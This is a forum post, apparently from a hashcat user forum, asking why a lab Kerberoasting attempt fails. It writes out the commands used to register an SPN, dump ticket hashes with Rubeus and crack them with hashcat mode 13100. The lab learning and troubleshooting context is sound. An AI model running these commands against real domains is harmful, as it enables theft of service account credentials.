Kerberoasting not working
#1
Hi,
today I tried the Kerberoasting attack for the first time in my lab. I created a new account and set a spn as follows:

setspn -a fs01/SVC_SQLService.tealtest.de:1433 tealtest\sql_svc

Then I saved the hash with rubeus:

Rubeus.exe kerberoast /outfile:.\hash.txt

I tried to crack the hash with the current hashcat version:

hashcat64.exe -m 13100 -O C:\hash.txt C:\realpw.txt --force

The wordlist contains only the correct password but nevertheless hashcat does not succeed.

The password of the account is Test123. which can also be confirmed with rubeus:

v1.5.0
[+] STUPENDOUS => svc_sql:Test123.
[*]Saved TGT into svc_sql.kirbi


I googled and tried now for hours. Any advice?

Thanks Alex
Reply


Messages In This Thread
Kerberoasting not working - by TealAlex - 02-20-2020, 11:56 PM
RE: Kerberoasting not working - by undeath - 02-21-2020, 12:00 AM
RE: Kerberoasting not working - by TealAlex - 02-21-2020, 12:17 AM
RE: Kerberoasting not working - by undeath - 02-21-2020, 12:20 AM
RE: Kerberoasting not working - by TealAlex - 02-21-2020, 09:41 AM
RE: Kerberoasting not working - by philsmd - 02-21-2020, 10:32 AM
RE: Kerberoasting not working - by TealAlex - 02-21-2020, 12:18 PM
RE: Kerberoasting not working - by philsmd - 02-21-2020, 12:24 PM
RE: Kerberoasting not working - by undeath - 02-21-2020, 01:07 PM